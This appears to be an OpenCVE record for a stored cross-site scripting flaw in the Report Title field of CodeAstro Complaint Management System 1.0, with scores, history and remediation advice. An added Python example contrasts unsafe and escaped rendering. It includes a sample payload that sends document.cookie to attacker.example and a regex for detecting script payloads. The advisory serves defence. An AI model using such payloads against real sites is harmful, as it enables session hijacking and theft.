Description
A security flaw has been discovered in CodeAstro Complaint Management System 1.0. This issue affects some unknown processing of the file /report/addreport of the component Report Handler. Performing a manipulation of the argument Report Title results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.
Published: 2026-06-29
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a cross-site scripting flaw in the Report Handler of CodeAstro Complaint Management System 1.0: the Report Title argument of /report/addreport is not neutralized before it is written into a web page. Because a report title is stored and later displayed to whoever reviews the report, the practical effect is that of a stored XSS: script supplied by a low-privileged submitter runs in the browser of the staff member or administrator who opens the report, which can be leveraged for session hijacking, actions performed with the victim's privileges, defacement, or data theft. The core weakness is CWE-79 (improper neutralization of input during web page generation). The record also tags CWE-94 (code injection), the broader injection class; nothing in the record (CVSS confidentiality none, integrity low, availability none) indicates server-side code execution.

Affected Systems

The affected product is CodeAstro Complaint Management System, version 1.0. No other versions are listed, but the CPE entry on the record is unversioned (cpe:2.3:a:codeastro:complaint_management_system:*), and no fixed release is named, so treat any deployment of the product as affected until the installed version is confirmed and a vendor fix exists.

Risk and Exploitability

The CVSS 4.0 score of 5.1 is medium severity. The EPSS score is below 1% (very low) and the vulnerability is not listed in the CISA KEV catalog, but a proof-of-concept exploit has been published (SSVC exploitation: poc). Every CVSS vector on the record requires low privileges (PR:L, Au:S in v2) and user interaction (UI:R in v3, UI:P in v4), so the realistic attack path is: an attacker with an ordinary account submits a crafted Report Title to /report/addreport, the title is stored, and the script runs when an administrator or other staff member views the report. The scored impact on the vulnerable system itself is integrity-low with no confidentiality or availability impact; the real damage comes from what the script can do with the victim's session and privileges.

Generated by OpenCVE AI on June 29, 2026 at 14:06 UTC.

Remediation

No vendor fix or workaround is currently listed.

OpenCVE Recommended Actions

  • Upgrade to a version of CodeAstro Complaint Management System that contains the XSS fix once the vendor publishes one; none is listed at the time of writing.
  • Implement robust server‑side validation of the Report Title input and, more importantly, HTML‑escape it for the context in which it is rendered (element body or attribute value) every time it is written into the admin panel. Escaping at output is what closes the bug; validation only narrows it.
  • Enforce a Content Security Policy that blocks inline scripts and restricts script execution to trusted sources, so an injected title cannot run even where escaping is missed.
  • Deploy a Web Application Firewall rule to block requests to /report/addreport whose Report Title contains script‑like payloads. Treat this as a stopgap: encoded or novel payloads will slip past pattern matching.

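To make the attack path described under Risk and Exploitability and the first three recommended actions concrete, here is an added Python example. It is not CodeAstro's code and not part of the OpenCVE record: a hypothetical stand-in for the report-listing template showing the unsafe concatenation beside the escaped rendering, a Content Security Policy string with a coarse check that it forbids inline script, and a WAF-style screen for a Report Title value. The markup, the field name, the payload and the sample titles are constructed for illustration.

```python
"""Added example, not CodeAstro's code: unsafe vs. escaped rendering of a stored
Report Title, a CSP that forbids inline script, and a WAF-style screen for the field.
The markup, field name and sample values are hypothetical stand-ins."""
import html
import re

# Constructed payload of the kind a low-privileged user could submit as a Report Title.
SAMPLE_TITLE = ('<script>fetch("https://attacker.example/c?"+'
                'encodeURIComponent(document.cookie))</script>')

# Constructed benign titles, used to check the screen does not block ordinary complaints.
BENIGN_TITLES = [
    "Broken street light on Main St",
    "Water supply on/off schedule is confusing",
]


def render_report_row_unsafe(title: str) -> str:
    """Vulnerable pattern (assumed; the real template is not on the page): the stored
    title is concatenated into HTML verbatim, so any markup in it is interpreted by
    the administrator's browser when the report list is viewed."""
    return f'<tr><td class="title">{title}</td></tr>'


def render_report_row_safe(title: str) -> str:
    """Fixed pattern: escape for the HTML text context at output time.
    quote=True also encodes quotes, so the same call is safe inside a quoted attribute."""
    return f'<tr><td class="title">{html.escape(title, quote=True)}</td></tr>'


# A policy that allows scripts only from the application's own origin.
# Without 'unsafe-inline', an injected <script> block or onerror= handler does not run.
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def csp_restricts_scripts(csp: str) -> bool:
    """True if the effective script-src allows neither inline script, eval, data: URIs
    nor every origin. Coarse directive parsing; browsers apply further rules for
    nonces and hashes, so this is a sanity check, not a full CSP evaluator."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src", []))
    forbidden = {"'unsafe-inline'", "'unsafe-eval'", "*", "data:"}
    return bool(sources) and not (set(sources) & forbidden)


# Coarse signature for a WAF-style rule on the Report Title field: script tags,
# javascript: URLs and inline event handlers. It is applied to the entity-decoded
# value so that &lt;script&gt; is not missed.
SCRIPT_PATTERN = re.compile(r"<\s*/?\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def looks_like_script_payload(report_title: str) -> bool:
    """WAF-style screen for the Report Title parameter (field name assumed).
    It catches obvious payloads and will miss novel or doubly-encoded ones,
    which is why output escaping, not this check, is the actual fix."""
    return bool(SCRIPT_PATTERN.search(html.unescape(report_title)))


if __name__ == "__main__":
    print("unsafe :", render_report_row_unsafe(SAMPLE_TITLE))
    print("safe   :", render_report_row_safe(SAMPLE_TITLE))
    print("csp ok :", csp_restricts_scripts(CSP_HEADER))
    for t in [SAMPLE_TITLE, *BENIGN_TITLES]:
        print("block  :", looks_like_script_payload(t), repr(t[:40]))
```

The escaping helper is deliberately applied at render time rather than at submission time: escaping on input corrupts data that is later used in a non-HTML context (exports, e-mail, JSON) and is easy to bypass through any second write path to the same table. The CSP and WAF checks reduce the blast radius and the noise of opportunistic scanners, but neither replaces the output encoding.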


Advisories

No advisories yet.

History

Mon, 29 Jun 2026 14:30:00 +0000

Values added:
  Metrics: ssvc
    {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 29 Jun 2026 12:00:00 +0000

Values added:
  Description: A security flaw has been discovered in CodeAstro Complaint Management System 1.0. This issue affects some unknown processing of the file /report/addreport of the component Report Handler. Performing a manipulation of the argument Report Title results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.
  Title: CodeAstro Complaint Management System Report addreport cross site scripting
  First Time appeared: Codeastro; Codeastro Complaint Management System
  Weaknesses: CWE-79; CWE-94
  CPEs: cpe:2.3:a:codeastro:complaint_management_system:*:*:*:*:*:*:*:*
  Vendors & Products: Codeastro; Codeastro Complaint Management System
  References:
  Metrics:
    cvssV2_0: {'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}
    cvssV3_0: {'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
    cvssV3_1: {'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
    cvssV4_0: {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}


MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-06-29T13:27:58.208Z

Reserved: 2026-06-28T16:04:57.032Z

Link: CVE-2026-13558

Vulnrichment

Updated: 2026-06-29T13:27:51.723Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-29T18:30:06Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

  • CWE-94

    Improper Control of Generation of Code ('Code Injection')